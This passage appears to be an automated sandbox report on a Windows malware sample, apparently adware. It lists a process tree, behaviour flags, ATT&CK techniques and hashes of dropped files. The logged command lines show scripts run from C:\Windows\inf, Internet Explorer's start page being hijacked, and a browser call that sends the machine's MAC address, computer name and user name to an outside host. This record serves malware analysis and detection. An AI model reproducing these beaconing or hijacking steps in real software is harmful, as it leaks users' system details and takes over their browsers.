  - Suspicious use of WriteProcessMemory
  PID:4264
- - C:\Windows\SysWOW64\cscript.exe
    CScript /nologo "C:\Windows\inf\pack.wsf" "C:\Windows\inf\1_yewnsemla.wzyxk"
    3⤵
    PID:3060
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\SysWow64\WScript.exe" "C:\Windows\inf\yewnsemla.wzyxk"
  2⤵
  - Checks computer location settings
  - Modifies Internet Explorer settings
  - Modifies Internet Explorer start page
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:4840
- - C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" http://www.5136688.com/?8
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:1860
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1860 CREDAT:17410 /prefetch:2
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:2632
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1860 CREDAT:82948 /prefetch:2
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:5080
- C:\Program Files\Internet Explorer\iexplore.exe
  "C:\Program Files\Internet Explorer\iexplore.exe" http://u.5136688.com/setuptj.asp?a_ip=&a_mac=D2:D0:01:7C:86:29&a_cpname=GBQHURCC&a_user=me&a_locip=0.0.0.0
  2⤵
  - Modifies Internet Explorer settings
  PID:3692
- \??\c:\windows\SysWOW64\wscript.exe
  c:\windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\Killme.vbs
  2⤵
  PID:2804

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Common Files\tk.reg

Filesize
2KB

MD5
3e3517218d5eb444b8604e35bd229668

SHA1
5891d44222f4304b30aadb002191711c6dd41233

SHA256
918f3680a4e8d10aec600ca2e2293a753855b625afa739d9e3fd8b721d0cb0c1

SHA512
820f2beb2cc8ffc52c5a11b57b3dfc1c722cfc5c24321032eaba5c5c818b79721c6583e54fddf1973e206a0bdbef38e48a935720ccfc3641701d85bde9d20b29

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

Filesize
471B

MD5
520071a63bb5e2038486cd0ce14055b1

SHA1
752cfb61bbe3ae1e2c2609c53aeee510661a59ed

SHA256
f8a989e9cf1fe0f0000c795537122a3c727e3b570b66582bfb62d9bbae4b20f8

SHA512
6f0131c9e0943c6a13d52a7525e1c592c95db868bf2dd21a8a37254150a239748985cc31518d0c4844bebfc5613feee6857b5debfbbbd6ed4539cd5e494ebbb2

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

Filesize
404B

MD5
c9cf0b94072c4be8394c5d1de5db0025

SHA1
aabf5ace56e63e51fb6a7ecd520408910d3e8975

SHA256
860bcf60c9a2608a1451d9ba0a95e7ac8b012e48e045f758e5263fbcd1a9961a

SHA512
e254df87ff3f56717bc44b4b269d98e92e3c2253638c298ee8fd10f8166713d87a3fdd51cbd8ccb5b2412a68ad7ac4a57c7e8bc85853209a807eb4405d4fff21

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\ru1r3yf\imagestore.dat

Filesize
1KB

MD5
3814de4ec66cde289434bd698a4caacb

SHA1
63ee6df482635bbc0ac65b2d22201f2d1c8b02ba

SHA256
e013b27e2a015df3e54d84bb962fb8b9c1b28dd6b0cf6e091391247f9bfb2450

SHA512
b81be2654a286875003b0c1661821267254341593a14a5b551c4d18e2f0dcc5006f812fcfa7326042de6a44d27e50d49fdf3dd99b8478d5d05a7e1e4b3470fb9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\GMQ6XNBF\favicon[1].ico

Filesize
1KB

MD5
7ef1f0a0093460fe46bb691578c07c95

SHA1
2da3ffbbf4737ce4dae9488359de34034d1ebfbd

SHA256
4c62eef22174220b8655590a77b27957f3518b4c3b7352d0b64263b80e728f2c

SHA512
68da2c2f6f7a88ae364a4cf776d2c42e50150501ccf9b740a2247885fb21d1becbe9ee0ba61e965dd21d8ee01be2b364a29a7f9032fc6b5cdfb28cc6b42f4793

Download Submit
C:\Users\Admin\AppData\Local\Temp\Killme.vbs

Filesize
307B

MD5
3247ba64efe12c627dfebf3f329fdea1

SHA1
728b77d4f24bf59bebe6b5d7a1ee152649df99a2

SHA256
afd40258ec3567e97be14cf7bc90fb4d33cffac8f487547697d2f779330faebf

SHA512
3ea327295d306f01f608b3985d8d036ec7c93d985d99eabf549fd2c63713b682d7401fe815c3ab351555870648ce41dddb41129e3ecbc87daa683936aff1372c

Download Submit
C:\Windows\inf\1_yewnsemla.wzyxk

Filesize
48KB

MD5
21378f2d367afa203f2445a82a6debba

SHA1
21b95e2dcd18c4b9ca24a6a9f651ff5018e3cac2

SHA256
70efcd5bab37454f070941b08c14fbba0193bed8593baf1d973599449d7b149c

SHA512
c3cf1cfa3fe4c686b2f79bf1980d74a6e5a62a40c7b7361cc701b136d08cf89cb2f264b2a807b3609078ea28381ca35c6ebb68aa1f63a36ac58d9399017c08f5

Download Submit
C:\Windows\inf\pack.wsf

Filesize
8KB

MD5
a83fdf4f29a7e978d33eeb3674df531b

SHA1
60ea7b41816bc2044a6224e38352e56667d3d5ed

SHA256
f85f16fb946e6b4d7ef4f6523276a52b4a68d04bdf340312adc2ccdef4cee845

SHA512
7ad293f3032054c7e55e89a558dde1e4465c31c1c9fd612e3f56fc209b40826af5273fe140273cf467a96dcda805f13844fa6244cbe2e113bfcf131117acdbd0

Download Submit
C:\Windows\inf\yewnsemla.wzyxk

Filesize
37KB

MD5
f6a792f9130dd2722dc076b5005efd07

SHA1
790ea1e36e007da5c64308f24e91e780cc0be726

SHA256
7fa426390fad592ca4c003c481859b0e90f091371bb26df3ef7a59042df3a583

SHA512
4a1c44f4c38b1d73464ec95b6a276d5b3434062830a8feafa6f85616c30d1e0f64de39b32af1ad7aebfcd781e9c8127d80b72e77dcd1005d3132d1bddf065f5e

Download Submit
\??\c:\about blank.htm

Filesize
76B

MD5
d5a3771f98d3a1d6dff888f6658c2b09

SHA1
6594a8b8add3e99538490ca905ad96c2b81d6d45

SHA256
0225dc5f53ae12c61851cf204a91494bdeb4812e9954eeab6000a88d3046fcc6

SHA512
9293b9b9371e11369904bf5da03846c832b760c0566d97ecfba0377033895740ce0fafcbb9ad5e20687999cd49f270bf31417a2de9898001bf19d968097d1f63

Download Submit
memory/4340-132-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/4340-147-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/4340-145-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads